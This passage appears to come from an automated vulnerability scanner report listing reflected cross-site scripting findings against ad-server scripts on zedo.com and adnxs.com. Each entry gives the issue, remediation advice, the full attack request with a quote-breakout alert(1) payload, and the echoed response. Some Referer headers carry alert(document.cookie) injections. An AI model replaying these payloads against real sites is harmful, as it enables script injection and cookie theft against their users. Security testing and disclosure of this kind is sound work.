Set-Cookie: FFpb=1190:c3133';alert(1)//414af5fb42a;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962#675816|0,1,1:0,1,1;expires=Thu, 02 Jun 2011 15:41:13 GMT;path=/;domain=.zedo.com;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 1634247266 1634246238
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=121
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:41:13 GMT
Connection: close
Content-Length: 2342

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',c3133';alert(1)//414af5fb42a';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,c3133';alert(1)//414af5fb42a;z="+Math.random();}

if(zzuid=='unknown')zzuid='-SHATcGt89Z6bBFZFIn3XV-r~050311';

var zzhasA
...[SNIP]...

6.11. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c90d'%3balert(1)//aabec897c95 was submitted in the $ parameter. This input was echoed as 9c90d';alert(1)//aabec897c95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=9c90d'%3balert(1)//aabec897c95&s=1&z=0.9079998980845427 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:9c90d';alert(1)//aabec897c95;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675796|0,1,1;expires=Thu, 02 Jun 2011 15:40:57 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=CSLATcGt89ZwKc5Sm87@K-RQ~050311;expires=Fri, 30 Apr 2021 15:40:57 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:40:57 GMT;domain=.zedo.com;path=/;
ETag: "19b86ed-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 920079178 920078218
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=137
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:40:57 GMT
Connection: close
Content-Length: 2543

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',9c90d';alert(1)//aabec897c95';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,9c90d';alert(1)//aabec897c95;z="+Math.random();}

var zzhasAd=undefined;


                               
...[SNIP]...

6.12. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7764c'%3balert(1)//3563881838f was submitted in the q parameter. This input was echoed as 7764c';alert(1)//3563881838f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=7764c'%3balert(1)//3563881838f&$=&s=1&z=0.01697743690668352 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=1190,1,9; FFad=0; FFChanCap=1583B1190,1#675962|0,1,1; ZEDOIDA=-SHATcGt89Z6bBFZFIn3XV-r~050311; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1583B1190,1#675962#675816|0,1,1:0,1,1;expires=Thu, 02 Jun 2011 15:41:12 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 1634247266 1634246238
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=122
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:41:12 GMT
Connection: close
Content-Length: 2339

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='7764c';alert(1)//3563881838f';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=7764c';alert(1)//3563881838f;z="+Math.random();}

if(zzuid=='unknown')zzuid='-SHATcGt89Z6bBFZFIn3XV-r~050311';

var zzhasAd
...[SNIP]...

6.13. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abc8e'%3balert(1)//755fc26b348 was submitted in the q parameter. This input was echoed as abc8e';alert(1)//755fc26b348 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=abc8e'%3balert(1)//755fc26b348&$=&s=1&z=0.9079998980845427 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:40:55 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675816|0,1,1;expires=Thu, 02 Jun 2011 15:40:55 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=ByLATcGt89a8pBwW75WfG3Fi~050311;expires=Fri, 30 Apr 2021 15:40:55 GMT;domain=.zedo.com;path=/;
ETag: "19b86ed-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 920079178 920078218
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=139
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:40:55 GMT
Connection: close
Content-Length: 2261

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='abc8e';alert(1)//755fc26b348';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=abc8e';alert(1)//755fc26b348;z="+Math.random();}

var zzhasAd=undefined;


                           
...[SNIP]...

6.14. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ff81"%3balert(1)//ead3d160fc3 was submitted in the q parameter. This input was echoed as 5ff81";alert(1)//ead3d160fc3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=5ff81"%3balert(1)//ead3d160fc3&$=&s=1&z=0.01697743690668352 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=1190,1,9; FFad=0; FFChanCap=1583B1190,1#675962|0,1,1; ZEDOIDA=-SHATcGt89Z6bBFZFIn3XV-r~050311; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1583B1190,1#675962#675816|0,1,1:0,1,1;expires=Thu, 02 Jun 2011 15:41:12 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 1634247266 1634246238
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=122
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:41:12 GMT
Connection: close
Content-Length: 2339

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='5ff81";alert(1)//ead3d160fc3';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=5ff81";alert(1)//ead3d160fc3;z="+Math.random();}

if(zzuid=='unknown')zzuid='-SHATcGt89Z6bBFZFIn3XV-r~050311';

var zzhasAd=undefined;


                                               var zzStr = "s=1;u=-SHATcGt89Z6bBFZ
...[SNIP]...

6.15. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 358a8"%3balert(1)//aa5cf3e9e9f was submitted in the q parameter. This input was echoed as 358a8";alert(1)//aa5cf3e9e9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=358a8"%3balert(1)//aa5cf3e9e9f&$=&s=1&z=0.9079998980845427 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:40:55 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#778908|0,1,1;expires=Thu, 02 Jun 2011 15:40:55 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=ByLATcGt89aI5vwvuTkcIrQs~050311;expires=Fri, 30 Apr 2021 15:40:55 GMT;domain=.zedo.com;path=/;
ETag: "19b86ed-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 920079178 920078218
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=139
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:40:55 GMT
Connection: close
Content-Length: 2284

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='358a8";alert(1)//aa5cf3e9e9f';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=358a8";alert(1)//aa5cf3e9e9f;z="+Math.random();}

var zzhasAd=undefined;


                                                                                                           var zzStr = "s=1;u=unknown;z=" + Math.random();
var
...[SNIP]...

6.16. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49922"%3balert(1)//84fc01aee65 was submitted in the $ parameter. This input was echoed as 49922";alert(1)//84fc01aee65 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=49922"%3balert(1)//84fc01aee65&s=1&z=0.9079998980845427 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:49922";alert(1)//84fc01aee65;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962|0,1,1;expires=Thu, 02 Jun 2011 15:40:54 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=BiLATcGt89bj@yEPgqr2WWJl~050311;expires=Fri, 30 Apr 2021 15:40:54 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:40:54 GMT;domain=.zedo.com;path=/;
ETag: "19b86ed-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 920079178 920078218
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=140
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:40:54 GMT
Connection: close
Content-Length: 2889

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',49922";alert(1)//84fc01aee65';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,49922";alert(1)//84fc01aee65;z="+Math.random();}

if(zzuid=='unknown')zzuid='unknown';

var zzhasAd=undefined;


                                   var zzStr = "s=1;u=unknown;z=" + Math.random();
var ainf
...[SNIP]...

6.17. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2748'%3balert(1)//d2806d13839 was submitted in the $ parameter. This input was echoed as b2748';alert(1)//d2806d13839 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=b2748'%3balert(1)//d2806d13839&s=1&z=0.9079998980845427 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:b2748';alert(1)//d2806d13839;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962|0,1,1;expires=Thu, 02 Jun 2011 15:40:54 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=BiLATcGt89bC2qMYwYFFL0X3~050311;expires=Fri, 30 Apr 2021 15:40:54 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:40:54 GMT;domain=.zedo.com;path=/;
ETag: "19b86ed-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 920079178 920078218
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=140
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:40:54 GMT
Connection: close
Content-Length: 2889

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',b2748';alert(1)//d2806d13839';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,b2748';alert(1)//d2806d13839;z="+Math.random();}

if(zzuid=='unknown')zzuid='unknown';

var zzhasAd=undefined;



...[SNIP]...

6.18. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d68c6'%3balert(1)//1b7b6b54f66 was submitted in the q parameter. This input was echoed as d68c6';alert(1)//1b7b6b54f66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=5&d=9&q=d68c6'%3balert(1)//1b7b6b54f66&$=&s=1&z=0.9079998980845427 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:40:54 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962|0,1,1;expires=Thu, 02 Jun 2011 15:40:54 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=BiLATcGt89amjI50-w4PEU7H~050311;expires=Fri, 30 Apr 2021 15:40:54 GMT;domain=.zedo.com;path=/;
ETag: "19b86ed-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 920079178 920078218
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=140
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:40:54 GMT
Connection: close
Content-Length: 2886

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='d68c6';alert(1)//1b7b6b54f66';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=d68c6';alert(1)//1b7b6b54f66;z="+Math.random();}

if(zzuid=='unknown')zzuid='unknown';

var zzhasAd=undefined;



...[SNIP]...

6.19. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d87ee"%3balert(1)//8b6d12f37ea was submitted in the q parameter. This input was echoed as d87ee";alert(1)//8b6d12f37ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=5&d=9&q=d87ee"%3balert(1)//8b6d12f37ea&$=&s=1&z=0.9079998980845427 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:40:53 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962|0,1,1;expires=Thu, 02 Jun 2011 15:40:53 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=BSLATcGt89YzHY4DG2oMe7A6~050311;expires=Fri, 30 Apr 2021 15:40:53 GMT;domain=.zedo.com;path=/;
ETag: "19b86ed-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 920079178 920078218
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=141
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:40:53 GMT
Connection: close
Content-Length: 2886

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='d87ee";alert(1)//8b6d12f37ea';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=d87ee";alert(1)//8b6d12f37ea;z="+Math.random();}

if(zzuid=='unknown')zzuid='unknown';

var zzhasAd=undefined;


                                   var zzStr = "s=1;u=unknown;z=" + Math.random();
var ainf
...[SNIP]...

6.20. http://ib.adnxs.com/ptj [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8925c'%3balert(1)//d2520030bec was submitted in the redir parameter. This input was echoed as 8925c';alert(1)//d2520030bec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=311&inv_code=cm.rev_lee&size=300x250&imp_id=cm-77237941_1304437410,11fda490648f83c&referrer=http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2F%3Fc3a2e%2522-alert%28%2522DORK%2522%29-%2522f8cf8d87874%3D1&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_lee%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-77237941_1304437410%2C11fda490648f83c%2CMiscellaneous%2Cax.{PRICEBUCKET}%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D975335%3Bcontx%3DMiscellaneous%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3D%3Bord%3D0.3433780161396228%3F8925c'%3balert(1)//d2520030bec HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
